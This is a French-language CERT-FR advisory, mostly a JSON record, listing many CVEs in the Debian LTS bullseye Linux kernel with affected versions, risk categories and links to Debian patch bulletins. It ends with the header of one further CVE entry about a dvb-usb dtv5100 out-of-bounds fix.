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CERTFR-2026-AVI-0167
Vulnerability from certfr_avis - Published: 2026-02-13 - Updated: 2026-02-13
De multiples vulnérabilités ont été découvertes dans le noyau Linux de Debian LTS. Elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un déni de service.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
References
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{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Debian LTS bullseye versions ant\u00e9rieures \u00e0 5.10.249-1",
"product": {
"name": "Debian",
"vendor": {
"name": "Debian",
"scada": false
}
}
},
{
"description": "Debian LTS bullseye versions ant\u00e9rieures \u00e0 6.1.162-1~deb11u1",
"product": {
"name": "Debian",
"vendor": {
"name": "Debian",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-36903",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36903"
},
{
"name": "CVE-2025-71075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71075"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2025-22083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22083"
},
{
"name": "CVE-2025-22107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22107"
},
{
"name": "CVE-2026-23098",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23098"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2025-68778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68778"
},
{
"name": "CVE-2026-23054",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23054"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2025-38104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38104"
},
{
"name": "CVE-2025-68380",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68380"
},
{
"name": "CVE-2025-39702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39702"
},
{
"name": "CVE-2026-23069",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23069"
},
{
"name": "CVE-2023-53421",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53421"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2022-49465",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49465"
},
{
"name": "CVE-2025-71071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71071"
},
{
"name": "CVE-2025-71191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71191"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-68364",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68364"
},
{
"name": "CVE-2025-71087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2025-40039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40039"
},
{
"name": "CVE-2025-68746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68746"
},
{
"name": "CVE-2025-68773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68773"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2026-23020",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23020"
},
{
"name": "CVE-2025-68796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68796"
},
{
"name": "CVE-2022-49168",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49168"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2025-68769",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68769"
},
{
"name": "CVE-2025-71189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71189"
},
{
"name": "CVE-2025-38408",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38408"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2026-23090",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23090"
},
{
"name": "CVE-2022-49711",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49711"
},
{
"name": "CVE-2026-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23064"
},
{
"name": "CVE-2025-38591",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38591"
},
{
"name": "CVE-2025-68806",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68806"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2026-23061",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23061"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2026-23047",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23047"
},
{
"name": "CVE-2025-22121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22121"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2025-68344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68344"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2025-68257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68257"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2026-23049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23049"
},
{
"name": "CVE-2022-49743",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49743"
},
{
"name": "CVE-2025-68347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68347"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2025-68780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68780"
},
{
"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2026-23101",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23101"
},
{
"name": "CVE-2026-23099",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23099"
},
{
"name": "CVE-2025-71121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71121"
},
{
"name": "CVE-2025-38022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38022"
},
{
"name": "CVE-2026-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23085"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2025-22090",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22090"
},
{
"name": "CVE-2025-68258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68258"
},
{
"name": "CVE-2025-39871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39871"
},
{
"name": "CVE-2025-37926",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37926"
},
{
"name": "CVE-2025-68291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68291"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2025-21946",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21946"
},
{
"name": "CVE-2025-68255",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68255"
},
{
"name": "CVE-2026-22980",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22980"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2025-71102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71102"
},
{
"name": "CVE-2025-68759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68759"
},
{
"name": "CVE-2026-23019",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23019"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2025-68335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68335"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2026-23030",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23030"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2025-71196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71196"
},
{
"name": "CVE-2025-68772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68772"
},
{
"name": "CVE-2026-23078",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23078"
},
{
"name": "CVE-2025-68785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68785"
},
{
"name": "CVE-2025-71130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71130"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2025-68223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68223"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2025-68724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68724"
},
{
"name": "CVE-2026-23103",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23103"
},
{
"name": "CVE-2026-23074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23074"
},
{
"name": "CVE-2025-71126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71126"
},
{
"name": "CVE-2025-68786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68786"
},
{
"name": "CVE-2025-71199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71199"
},
{
"name": "CVE-2024-42079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42079"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2024-49968",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49968"
},
{
"name": "CVE-2025-68259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68259"
},
{
"name": "CVE-2025-71125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71125"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2025-71069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71069"
},
{
"name": "CVE-2026-22994",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22994"
},
{
"name": "CVE-2026-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23083"
},
{
"name": "CVE-2025-68774",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68774"
},
{
"name": "CVE-2026-23108",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23108"
},
{
"name": "CVE-2025-38119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38119"
},
{
"name": "CVE-2025-71180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71180"
},
{
"name": "CVE-2025-38232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38232"
},
{
"name": "CVE-2025-71194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71194"
},
{
"name": "CVE-2025-37830",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37830"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2026-23068",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23068"
},
{
"name": "CVE-2025-68765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68765"
},
{
"name": "CVE-2026-23089",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23089"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2026-23071",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23071"
},
{
"name": "CVE-2026-23056",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23056"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2024-36927",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36927"
},
{
"name": "CVE-2023-54321",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54321"
},
{
"name": "CVE-2025-22111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22111"
},
{
"name": "CVE-2026-23063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23063"
},
{
"name": "CVE-2026-23073",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23073"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2026-23058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23058"
},
{
"name": "CVE-2025-71182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71182"
},
{
"name": "CVE-2026-23038",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23038"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2025-71186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71186"
},
{
"name": "CVE-2025-68821",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68821"
},
{
"name": "CVE-2026-23026",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23026"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2025-71190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71190"
},
{
"name": "CVE-2026-23107",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23107"
},
{
"name": "CVE-2025-68332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68332"
},
{
"name": "CVE-2025-71104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71104"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2026-23037",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23037"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2023-54207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54207"
},
{
"name": "CVE-2025-68740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2025-68742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68742"
},
{
"name": "CVE-2026-23025",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23025"
},
{
"name": "CVE-2024-46786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46786"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2025-68256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2025-38556",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38556"
},
{
"name": "CVE-2026-22982",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22982"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2025-71150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71150"
},
{
"name": "CVE-2025-39721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39721"
},
{
"name": "CVE-2026-23091",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23091"
},
{
"name": "CVE-2025-38718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38718"
},
{
"name": "CVE-2025-71192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71192"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2025-68799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68799"
},
{
"name": "CVE-2025-68345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68345"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2026-23087",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23087"
},
{
"name": "CVE-2025-71185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71185"
},
{
"name": "CVE-2026-23096",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23096"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2025-40149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40149"
},
{
"name": "CVE-2025-40164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40164"
},
{
"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2023-52658",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52658"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2026-23075",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23075"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-23105",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23105"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2025-68753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68753"
},
{
"name": "CVE-2025-68781",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68781"
},
{
"name": "CVE-2025-68369",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68369"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54285"
},
{
"name": "CVE-2026-23086",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23086"
},
{
"name": "CVE-2025-22022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22022"
},
{
"name": "CVE-2025-68818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68818"
},
{
"name": "CVE-2025-38125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38125"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2026-23095",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23095"
},
{
"name": "CVE-2025-68346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68346"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2025-71105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71105"
},
{
"name": "CVE-2025-68266",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68266"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2026-23033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23033"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2026-23003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23003"
},
{
"name": "CVE-2025-68766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68766"
},
{
"name": "CVE-2026-23076",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23076"
},
{
"name": "CVE-2025-71123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71123"
},
{
"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2026-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23084"
},
{
"name": "CVE-2026-22979",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22979"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2026-23110",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23110"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2026-23060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23060"
},
{
"name": "CVE-2025-68282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68282"
},
{
"name": "CVE-2025-68817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68817"
},
{
"name": "CVE-2025-71119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71119"
},
{
"name": "CVE-2025-68787",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68787"
},
{
"name": "CVE-2025-68782",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68782"
},
{
"name": "CVE-2025-71197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71197"
},
{
"name": "CVE-2025-68758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68758"
},
{
"name": "CVE-2026-23031",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23031"
},
{
"name": "CVE-2025-71113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71113"
},
{
"name": "CVE-2025-71127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71127"
},
{
"name": "CVE-2026-23102",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23102"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2025-68340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68340"
},
{
"name": "CVE-2025-40110",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40110"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2025-68336",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68336"
},
{
"name": "CVE-2023-52975",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52975"
},
{
"name": "CVE-2026-23097",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23097"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2026-23021",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23021"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2026-23093",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23093"
},
{
"name": "CVE-2025-71183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71183"
},
{
"name": "CVE-2025-68371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68371"
},
{
"name": "CVE-2025-68211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68211"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2025-68263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68263"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2022-48744",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48744"
},
{
"name": "CVE-2025-71149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71149"
},
{
"name": "CVE-2025-68767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68767"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2026-23080",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23080"
},
{
"name": "CVE-2025-38361",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38361"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
}
],
"initial_release_date": "2026-02-13T00:00:00",
"last_revision_date": "2026-02-13T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0167",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-13T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de Debian LTS. Elles permettent \u00e0 un attaquant de provoquer une \u00e9l\u00e9vation de privil\u00e8ges, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et un d\u00e9ni de service.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de Debian LTS",
"vendor_advisories": [
{
"published_at": "2026-02-10",
"title": "Bulletin de s\u00e9curit\u00e9 Debian LTS DLA-4476-1",
"url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00017.html"
},
{
"published_at": "2026-02-10",
"title": "Bulletin de s\u00e9curit\u00e9 Debian LTS DLA-4475-1",
"url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00016.html"
}
]
}
CVE-2025-68819 (GCVE-0-2025-68819)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-08-05 12:11
VLAI
EPSS
VEX
Title
media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()
